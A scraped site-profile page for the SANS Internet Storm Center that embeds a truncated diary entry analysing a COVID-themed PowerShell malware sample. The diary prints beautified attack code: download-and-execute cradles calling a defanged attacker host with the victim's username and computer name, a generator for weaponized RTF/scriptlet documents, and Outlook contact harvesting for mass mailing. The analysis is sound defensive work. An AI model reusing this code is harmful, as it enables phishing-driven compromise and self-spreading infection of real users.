isc.sans.orgSANS Internet Storm Center
isc.sans.org Profile
Isc.sans.org is a subdomain of Sans.org, which was created on 1995-08-04,making it 29 years ago.
Description:SANS Internet Storm Center. Today's Top Story: Weaponized RTF Document Generator & Mailer in...
Discover isc.sans.org website stats, rating, details and status online.Use our online tools to find owner and admin contact info. Find out where is server located.Read and write reviews or vote to improve it ranking. Check alliedvsaxis duplicates with related css, domain relations, most used words, social networks references. Go to regular site
isc.sans.org Information
| HomePage size: 42.176 KB |
| Page Load Time: 0.207078 Seconds |
| Website IP Address: 204.51.94.153 |
isc.sans.org Similar Website
| TurnKey Internet - Official Blog - Data Center & Cloud Hosting Solutions TurnKey Internet |
| Fine Art Storm Photographs on Metal, Canvas, Paper and more |
| NOAA/NWS Storm Prediction Center |
| - Hurricane Shutters, Storm Shutters, and Accordion Shutters |
| Hurricane and Storm Tracking |
| MyRadar | Keeping you ahead of the storm |
| Packet Storm |
| Roots of the Storm - Home |
| Entergy Storm Center - Stay informed and stay safety aware |
| Reading Eagle - Reading, PA | Storm Center | readingeagle.com |
| Current sunspot cycle activity - Solar Cycle 25; Space weather, solar storm and geomagnetic conditio |
| Larson Storm Door Replacement Parts |Larson Storm Doors |
| SANS Internet Storm Center |
| CenHud Storm Center |
| Internet Service Providers | Unlimited Residential Internet | KWIC Internet |
isc.sans.org PopUrls
| Internet Storm Center https://isc.sans.org/ |
isc.sans.org Httpheader
| Date: Sat, 18 Apr 2020 01:45:00 GMT |
| Server: Apache |
| X-Content-Type-Options: nosniff |
| X-XSS-Protection: 1; mode=block |
| X-HeyJason: DEV522 rocks |
| Permitted-Cross-Domain-Policies: none |
| Expect-CT: max-age=0, report-uri="https://isc.sans.edu/cspreport.html" |
| X-Do-Not-Hack: 18 U.S.C. Parag 1030 |
| X-Frame-Options: SAMEORIGIN |
| Strict-Transport-Security: max-age=31556926; includeSubdomains; preload |
| Referrer-Policy: same-origin |
| Content-Security-Policy: "default-src self; script-src self unsafe-inline unsafe-eval ; style-src self unsafe-inline; img-src self https://isc.sans.edu data:; font-src self https://fonts.gstatic.com data:; connect-src none; media-src self; object-src none; child-src self https://www.sans.org; frame-src self https://www.sans.org https://www.youtube.com; worker-src none; frame-ancestors https://www.sans.org; form-action self; upgrade-insecure-requests; block-all-mixed-content; disown-opener; reflected-xss block; manifest-src none; referrer origin-when-cross-origin; report-uri https://isc.sans.edu/cspreport.html;", Vary: Accept-Encoding |
| Content-Encoding: gzip |
| Cache-Control: max-age=0, public |
| Expires: Sat, 18 Apr 2020 01:45:00 GMT |
| Keep-Alive: timeout=30, max=300 |
| Connection: Keep-Alive |
| Content-Type: text/html; charset=UTF-8 |
| Set-Cookie: nlbi_2188750=AImIaOOH/xwl28UIDW1UNgAAAAA18LuF5BmwKLSO5OGwvIez; path=/; Domain=.sans.edu; Secure; SameSite=None, visid_incap_2188750=Da2VYzPmSdK9Uwr809jTlZxbml4AAAAAQUIPAAAAAAA2IDhTaVPrU43qBINBdahc; expires=Sat, 17 Apr 2021 10:33:52 GMT; HttpOnly; path=/; Domain=.sans.edu; Secure; SameSite=None, incap_ses_1162_2188750=BiKeTDl0tn7JB+o6/UAgEJxbml4AAAAACVwha/dLj8luhV0LKGOUAQ==; path=/; Domain=.sans.edu; Secure; SameSite=None, ___utmvmNFBuREXZZ=pMzIBDilxKj; path=/; Max-Age=900; Secure; SameSite=None, ___utmvaNFBuREXZZ=SwK\x01DODc; path=/; Max-Age=900; Secure; SameSite=None, ___utmvbNFBuREXZZ=RZt\r\n XacOAalj: ytU; path=/; Max-Age=900; Secure; SameSite=None |
| X-CDN: Incapsula |
| Transfer-Encoding: chunked |
| X-Iinfo: 6-18129345-18042012 pNNN RT(1587174300199 15) q(0 0 0 0) r(1 1) U12 |
isc.sans.org Meta Info
| content="text/html; charset=utf-8" http-equiv="Content-Type"/ |
| charset="utf-8"/ |
| content="" name="viewport" width="device-width, initial-scale=1.0"/ |
| content="SANS Internet Storm Center" property="og:site_name" |
| content="en_US" property="og:locale" |
| content="website" property="og:type"/ |
| content="https://isc.sans.edu/index_dyn.html" property="og:url"/ |
| content="@sans_isc" property="twitter:site"/ |
| content="@sans_isc" property="twitter:creator"/ |
| content="summary_large_image" property="twitter:card"/ |
| content="https://isc.sans.edu/images/logos/isc/large.png" property="twitter:image"/ |
| content="SANS Internet Storm Center" property="twitter:image:alt"/ |
| content="https://isc.sans.edu/images/logos/isc/large.png" property="og:image"/ |
| content="SANS Internet Storm Center. Today's Top Story: Weaponized RTF Document Generator & Mailer in PowerShell;" name="description"/ |
| content="SANS Internet Storm Center. Today's Top Story: Weaponized RTF Document Generator & Mailer in PowerShell;" property="og:description"/ |
| content="SANS Internet Storm Center" name="AUTHOR"/ |
| content="isc, sans, internet, security, threat, worm, virus, phishing, hacking, vulnerability" name="KEYWORDS"/ |
| content="width=device-width, initial-scale=1" name="viewport"/ |
isc.sans.org Ip Information
| Ip Country: United States |
| Latitude: 37.751 |
| Longitude: -97.822 |
isc.sans.org Html To Plain Text
Threat Level: green Handler on Duty: Guy Bruneau SANS ISC: SANS Site Network Current Site Other SANS Sites Help Graduate Degree Programs Security Training Security Certification Security Awareness Training Penetration Testing Industrial Control Systems Cyber Defense Foundations DFIR Software Security Government OnSite Training Sign Up for Free! Forgot Password? Log In or Sign Up for Free ! Help us find Covid19 related scams using our domain classifier tool . Last Daily Podcast (Fri, Apr 17th): Applocker vs LOTL; Netlink GPON 0Day; Windows Security Crash; Bad Gems; vCenter Exploit Latest Diaries Weaponized RTF Document Generator & Mailer in PowerShell Published : 2020-04-17 Last Updated : 2020-04-17 10:35:19 UTC by Xavier Mertens (Version: 1) 0 comment(s) Another piece of malicious PowerShell script that I found while hunting. Like many malicious activities that occur in those days, it is related to the COVID19 pandemic. Its purpose of simple: It checks if Outlook is used by the victim and, if it’s the case, it generates a malicious RTF document that is spread to all contacts extracted from Outlook. Let’s have a look at it. The script is available on VT (SHA256: 1f7f0d75fe5dace66ec9b5935d28ba02765527f09f58345c2e33e17ab4c91bd7) and has a low score of 8/60[ 1 ]. First, it performs malicious activity only if Outlook is available on the victim’s computer: if((get-childitem C:\Users\$env:username\AppData\Local\Microsoft\Outlook).count -gt 1) { ... } If the test is successful, a malicious RTF document is generated and dumped on disk (’urgent.doc’). Here is the beautified code. Most of the code was compressed and Base64-encoded. $gdoc_cmd=’cmd /c powershell IEx(New-Object Net.WebClient)."DownLoadString"(’’hxxp://t[.]awcna[.]com/mail.jsp?%username%*%computername%’’)’ $dde_cmd=’powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(’’hxxp://t[.]awcna[.]com/mail.jsp?dde*%username%*%computername%’’)&’ $att=$env:tmp+"\urgent.doc" $gdoc_title=’PROTECTED DOCUMENT’ $gdoc_text=’This file is protected by Microsoft Office.Please enable Editing and Content to see this document.’ function str2hex($str) { -join([Text.Encoding]::UTF8.getbytes($str)|foreach{$_.ToString(’x2’)}) } function u162hex($str){ -join([Text.Encoding]::Unicode.getbytes($str)|foreach{$_.ToString(’x2’)}) } function int2hex($num){ [bitconverter]::ToString([BitConverter]::getBytes([int32]$num)).replace("-","").tolower() } $cmd=$gdoc_cmd.replace("’","\’") $filename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count 15)+".sct" $filename="7UFNDWH1X5OPDY1.sct" $fakepath="C:\fakepath\$filename" $data=@" ?XML version="1.0"? scriptlet registration description="fjzmpcjvqp" prog version="1.00" class remotable="true" /registration script language="JScript" ![CDATA[ new ActiveXObject("WScript.Shell").Run(’$cmd’,0,1);window.close(); ]] /script /scriptlet "@.trim()-replace"r","" $package_data="0200"+(str2hex $filename)+"00"+(str2hex $fakepath)+"0000000300"+(int2hex ($fakepath.length+1))+ \ (str2hex $fakepath)+"00"+(int2hex $data.length)+(str2hex $data)+(int2hex $fakepath.length)+ \ (u162hex $fakepath)+(int2hex $filename.length)+(u162hex $filename)+(int2hex $fakepath.length)+(u162hex $fakepath) $header_data="0105000002000000080000005061636b616765000000000000000000"+(int2hex ($package_data.length/2)) $package="{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "+$header_data+$package_data+"0105000000000000}}" $rtf=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream.(,$([Convert]::FromBase64String(’ 7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGA \ qsgfP358Hz8ifvEv/n3r9hfv/BL6WU1+Op+2+JGt27JYvsWv69Usa3P69lv4a1pmTZN+t6pn46fVdL3Il+344Jf8EvM1Nc3Snd2d+zt49nbkeSg/9p/tn+zf \ v7e3f/Lpw09PP32i34bPMf55unPybHf3dOd498nu7vHpbrSl99w7xT87O89Onz3j3j4daGgg9SDqBwZj/RPw8HRbP/vR86Pn/yfP/yuH8VR/qvz1fv7o+dHz \ o+cbef7fCOQ+2eFPn8n/H+yLWd4nn+LTU/n7AX3wQL2Kn41nF/7D/b6dt/4BexvuOQne3h/yPnYe7Ow//fTk+NN7D57cf7pHXoaD4iDj2YW3ROMlwJ/edx// \ 0B54YXvDfs6N77/ns9v1yO7p+MEHhMv+Q5n7Tz8VnvjZfnYxG5gfg5XO0zc+/n392eUYjB9zb8b95GePBl2U8OwCrx/G/CtvP3nQ+dzQ3UiFoX/HD7B00/d/ \ 5B/86PnR837P/xtbq/zvmcxBP14PH2t/H95gl50+udF+7x7LX3v37+/vP72Pnye/ePeX0CekkI+fPj2Vr29+7h3oT0+Z7ZHiu09Kdv+p6ED+m7D4xXu/5OTT \ 42fHT05Pdh8+ePZ0b5d+HHBXzw4e3H9wuqdY3f6xNP2UqON5GUM+i23feR6S9f10x/Nd3vPZxXyC6k9vbPqj54f4/NC6MllBfX4JP79x8v8A’)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() -f $package,(str2hex $filename),(u162hex $filename) $rtf_header=" \ {\rtf1\adeflang1025\ansi\ansicpg936\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang103 \ 3\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 020206030 \ 50405020304}Times New Roman;} {\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}\’cb\’ce\’cc\’e5{\*\falt SimSun};}{\f34\fbidi \froman\ \ fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;} ... \fs21\lang1033\langfe2052\kerning2\loch\af31506\hich\af31506\dbch\af31505\cgrid\langnp1033\langfenp2052 {\rtlch\fcs1 \af3 \ 1507\afs60 \ltrch\fcs0 \b\fs60\insrsid338069 \hich\af31506\dbch\af31505\loch\f31506 AAAAAAAA}{\rtlch\fcs1 \af31507\afs60 \ \ltrch\fcs0 \b\fs60\insrsid859070\charrsid859070\par }{\rtlch\fcs1 \af31507 \ltrch\fcs0 \lang1024\langfe1024\noproof\insr \ sid338069 {\shp{\*\shpinst\shpleft397\shptop564\shpright8667\shpbottom4384\shpfhdr0\shpbxcolumn\shpbxignore\shpbypara\shp \ byignore\shpwr3\shpwrk0\shpfblwtxt0\shpz0\shplid1026 ... \hich\af31506\dbch\af31505\loch\f31506 BBBBBBBB}{\rtlch\fcs1 \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid859070 ... \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid7149827\charrsid7149827 \hich\af31506\dbch\af31505\loch\f31506 C:\\\\Programs \ \\\\Microsoft\\\\Office}{\rtlch\fcs1 \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid7149827 \\\\\hich\af31506\dbch\af31505\l \ och\f31506 12}{\rtlch\fcs1 \af31507\afs28 \ltrch\fcs0 \fs28\cf6\insrsid7149827\charrsid7149827 \\\\\hich\af31506\dbch\af3 \ 1505\loch\f31506 MSWord\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\system32\\\\cmd.exe /c}{\rtlch\fcs1 \af31507\afs28 \l \ trch\fcs0\fs28\cf6\insrsid7149827 \hich\af31506\dbch\af31505\loch\f31506 calc.exe" }{\rtlch\fcs1 \af31507\afs28 \ltrch\f \ cs0 \fs28\cf6\insrsid748411 \hich\af31506\dbch\af31505\loch\f31506 "Microsoft Office Remote \hich\af31506\dbch\af31505\lo \ ch\f31506 Database" } ... \lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority31 \lsdlocked0 Subtle Reference;\lsdsemihidden0 \lsdunhideused0 \ \lsdqformat1 \lsdpriority32 \lsdlocked0 Intense Reference;\lsdsemihidden0 \lsdunhideused0 \lsdqformat1 \lsdpriority33 \ls \ dlocked0 Book Title;\lsdpriority37 \lsdlocked0 Bibliography;\lsdqformat1 \lsdpriority39 \lsdlocked0 TOC Heading;}}" .replace("AAAAAAAA",$gdoc_title).replace("BBBBBBBB",$gdoc_text).replace("calc.exe",$dde_cmd) ($rtf_header+$rtf.substring(3))|out-file -encoding ascii $att The code is much more longer but I kept only the relevant part where the attacker replaces ’AAAAAAAA’ by the document title, ’BBBBBBBB’ by some juicy text and finally the ’calc.exe’ command by his own malicious recipe (a Powershell script). The generated document (SHA256:88917f08fd169a257de0a015e83dcc11a41f5a87138d66a79e98b078bf804939) has a VT score of 31/59 on VT[ 2 ] and here is how it looks when opened: Once the document generated, it is sent to all contacts found in Outlook: $global:contacts=@() $curr_date=Get-Date -Format "yyyy-MM-dd" # Extract email addresses function get_contacts($ol_folders) { $folders=$ol_folders.folders if($folders.count -ge 1){ foreach($folder in $folders) { get_contacts($folder) } } foreach($item in $ol_folders.items) { $global:contacts+=$item.Email1Address } } # Cover our tracks and delete sent emails function...
isc.sans.org Whois
Domain Name: sans.org Registry Domain ID: 9fe3e142e4ec482e8fbf4dc13650e53a-LROR Registrar WHOIS Server: http://whois.domainpeople.com Registrar URL: http://www.domainpeople.com Updated Date: 2022-12-07T15:29:04Z Creation Date: 1995-08-04T04:00:00Z Registry Expiry Date: 2027-08-03T04:00:00Z Registrar: DomainPeople, Inc. Registrar IANA ID: 65 Registrar Abuse Contact Email: abuse@hostway.com Registrar Abuse Contact Phone: +1.8664678929 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Data Protected Registrant State/Province: MD Registrant Country: US Name Server: ns-1270.awsdns-30.org Name Server: ns-1746.awsdns-26.co.uk Name Server: ns-282.awsdns-35.com Name Server: ns-749.awsdns-29.net DNSSEC: unsigned >>> Last update of WHOIS database: 2024-05-17T19:36:28Z <<<